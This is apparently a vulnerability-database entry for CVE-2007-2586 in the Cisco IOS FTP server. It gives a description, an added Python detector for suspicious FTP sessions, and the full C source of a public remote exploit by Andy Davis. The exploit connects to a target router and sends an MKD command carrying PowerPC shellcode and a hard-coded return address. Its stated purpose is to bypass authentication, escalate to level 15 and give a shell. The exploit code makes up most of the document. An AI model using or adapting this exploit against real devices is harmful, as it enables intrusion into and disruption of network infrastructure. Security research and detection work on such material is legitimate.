Cisco IOS FTP Server Unauthorized Access and Denial of Service Vulnerability

Vulnerability ID: 1115786    Type: Permissions, Privileges and Access Control
Published: 2008-07-29    Updated: 2009-03-04
CVE: CVE-2007-2586    CNNVD-ID: CNNVD-200705-168
Platform: Hardware    CVSS score: 9.3
|Sources
https://www.exploit-db.com/exploits/6155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-168
|Vulnerability Details
Cisco IOS is the operating system used by Cisco network devices. The FTP server bundled with Cisco IOS has a vulnerability in its handling of access requests; a remote attacker could exploit it to gain unauthorized access to system files or to cause a denial of service. Cisco IOS with the IOS FTP server feature enabled does not properly check user authorization, which may allow an attacker unauthorized read and write access to arbitrary files in the device file system, including the device's saved configuration, which may contain passwords or other sensitive information. In addition, a device configured this way may reload IOS while a file is being transferred over FTP.
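As an added defender-side example (not part of this record or of the exploit author's code), the check below scans a captured FTP control-channel log for the two behaviours this record describes: file-system commands accepted before the server has confirmed a login, and an MKD argument that is oversized or carries non-printable bytes instead of a directory name. The session tuple format, the constructed sample sessions and the 64-byte length threshold are assumptions made for the example.

```python
import re

# Commands that touch the device file system and should never succeed
# before the server has accepted a login.
FILE_COMMANDS = {"RETR", "STOR", "APPE", "MKD", "RMD", "DELE", "LIST", "NLST"}
MAX_MKD_LEN = 64  # assumption: no legitimate IOS flash:/nvram: path comes close

def analyze_session(session):
    """session: list of (direction, line); 'C' = client command, 'S' = server reply.
    Returns a list of (reason, offending_line) findings."""
    findings = []
    logged_in = False
    for direction, line in session:
        if direction == "S":
            # Only a 230 reply marks the login as accepted; 331/530 do not.
            if line.startswith("230"):
                logged_in = True
            continue
        parts = line.split(" ", 1)
        cmd = parts[0].upper()
        arg = parts[1] if len(parts) > 1 else ""
        if cmd in FILE_COMMANDS and not logged_in:
            findings.append(("file command before successful login", line))
        if cmd == "MKD":
            if len(arg) > MAX_MKD_LEN:
                findings.append(("oversized MKD argument", line))
            if re.search(r"[^\x20-\x7e]", arg):
                findings.append(("non-printable bytes in MKD argument", line))
    return findings

# Constructed sample: a failed login followed by file access and a binary MKD argument.
SAMPLE_SESSION = [
    ("S", "220 FTP server ready"),
    ("C", "USER cisco"),
    ("S", "331 Password required"),
    ("C", "PASS wrongpass"),
    ("S", "530 Login incorrect"),
    ("C", "RETR nvram:startup-config"),
    ("C", "MKD " + "\x3c\x80\x81\x83" + "a" * 80),
    ("C", "QUIT"),
]

# Constructed sample: a normal session that should produce no findings.
BENIGN_SESSION = [
    ("C", "USER backup"),
    ("S", "331 Password required"),
    ("C", "PASS hunter2"),
    ("S", "230 User logged in"),
    ("C", "MKD flash:/backup"),
]
```

Running analyze_session over SAMPLE_SESSION yields four findings (one for RETR, three for the MKD line); BENIGN_SESSION yields none.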
|Exploit
/*

 Cisco IOS FTP server remote exploit by Andy Davis 2008

 Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

 Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

 Removes the requirement to authenticate and escalates to level 15

 *********************************************************************
 To protect the innocent a critical step has been omitted, which means
 the shellcode will only execute when the router is attached to gdb.
 I'm sure the PowerPC shellcoders out there will work it out...
 *********************************************************************

 Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
 on the original IOS security research

 iosftpexploit <at> googlemail 'dot' com

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>         /* memset() */
#include <unistd.h>         /* close() */

#define PORT 21

int main(int argc, char **argv)
{
    /* The whole payload is carried as the argument of a single MKD command. */
    unsigned char sendbuf[] =

    "MKD "

    /* .equ vty_info, 0x8182da60    # pointer to VTY info */
    /* .equ terminate, 0x80e4086c   # kill a process */

    "\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
    "\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
    "\x7d\x08\x42\x78"      /* xor     8,8,8 */
    "\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
    "\x91\x07\x01\x74"      /* stw     8,372(7) */
    "\x39\x08\xff\xff"      /* subi    8,8,1 */
    "\x38\xe7\x09\x1a"      /* addi    7,7,233 */
    "\x91\x07\x04\xca"      /* stw     8,1226(7) */
    "\x7d\x03\x43\x78"      /* mr      3,8 */
    "\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
    "\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
    "\x7c\x89\x03\xa6"      /* mtctr   4 */
    "\x4e\x80\x04\x20"      /* bctr    */

    /* exits cleanly without adversely affecting the FTP server */

    "\x61\x61\x61\x61"      /* padding */
    "\x61\x61\x61\x61"      /* padding */
    "\x61\x61\x61\x61"      /* padding */
    "\x61\x61\x61\x61"      /* padding */
    "\x61\x61\x61\x61"      /* padding */
    "\x61\x61\x61\x61"      /* padding */

    "\x80\x06\x23\xB8"      /* return address */
    "\x0d\x0a";

    /* trampoline code */
    /* when the overflow occurs r26+0x14 points to the shellcode */
    /*
    0x800623B8      lwz     26, 20(26)
    0x800623BC      mtctr   26
    0x800623C0      mr      3, 27
    0x800623C4      bctrl
    */

    unsigned char recvbuf[256];
    struct sockaddr_in servaddr;
    int s;

    if (argc != 2)
    {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
        printf ("\nUsage: %s <target IP address>\n", argv[0]);
        exit(-1);
    }

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = inet_addr(argv[1]);
    servaddr.sin_port = htons(PORT);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0 || connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0)
    {
        perror("connect");
        exit(1);
    }
    printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
    printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
    printf ("Sending exploit...\n\n");

    /* send() reports failure with -1, not 0; sizeof-1 drops the terminating NUL */
    if (send(s, sendbuf, sizeof(sendbuf)-1, 0) < 0)
    {
        printf("Error sending packet...quitting\n\n");
        exit (1);
    }
    recv (s, recvbuf, sizeof(recvbuf)-1, 0);
    printf ("Now telnet to the router for a shell...\n\n");
    close(s);
    return 0;
}

// milw0rm.com [2008-07-29]
|References

Source: CISCO
Name: 20070509 Multiple Vulnerabilities in the IOS FTP Server
Link: http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
Source: XF
Name: cisco-ios-ftp-unauthorized-access(34197)
Link: http://xforce.iss.net/xforce/xfdb/34197
Source: SECTRACK
Name: 1018030
Link: http://www.securitytracker.com/id?1018030
Source: BID
Name: 23885
Link: http://www.securityfocus.com/bid/23885
Source: OSVDB
Name: 35334
Link: http://www.osvdb.org/35334
Source: VUPEN
Name: ADV-2007-1749
Link: http://www.frsirt.com/english/advisories/2007/1749
Source: SECUNIA
Name: 25199
Link: http://secunia.com/advisories/25199
Source: BUGTRAQ
Name: 20090120 Re: Remote Cisco IOS FTP exploit
Link: http://seclists.org/bugtraq/2009/Jan/0183.html
Source: OVAL
Name: oval:org.mitre.oval:def:5036
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5036